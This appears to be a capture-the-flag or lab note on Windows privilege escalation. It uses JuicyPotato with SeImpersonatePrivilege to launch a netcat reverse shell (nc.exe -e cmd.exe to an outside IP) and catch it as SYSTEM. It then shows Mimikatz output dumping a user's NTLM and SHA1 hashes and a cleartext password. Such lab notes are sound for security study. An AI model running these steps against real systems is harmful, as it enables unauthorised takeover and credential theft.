3 privesc
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
OS Name: Microsoft Windows Server 2016 Standard
Using JuicyPotato
https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe
# SeImpersonatePrivilege; SeCreateGlobalPrivilege
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c PATH\nc.exe -e cmd.exe 10.2.74.151 9999" -t *
$ rlwrap nc -lvnp 9999
listening on [any] 9999 ...
connect to [10.10.14.34] from (UNKNOWN) [10.10.10.29] 53225
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
whoami
whoami
nt authority\system
# loaded Mimikatz and extracted password for Sandra
Authentication Id : 0 ; 294058 (00000000:00047caa)
Session : Interactive from 1
User Name : sandra
Domain : MEGACORP
Logon Server : PATHFINDER
Logon Time : 4/24/2021 8:42:29 PM
SID : S-1-5-21-1035856440-4137329016-3276773158-1105
msv :
[00000003] Primary
* Username : sandra
* Domain : MEGACORP
* NTLM : 29ab86c5c4d2aab957763e5c1720486d
* SHA1 : 8bd0ccc2a23892a74dfbbbb57f0faa9721562a38
* DPAPI : f4c73b3f07c4f309ebf086644254bcbc
tspkg :
wdigest :
* Username : sandra
* Domain : MEGACORP
* Password : (null)
kerberos :
* Username : sandra
* Domain : MEGACORP.LOCAL
* Password : Password1234!
Last updated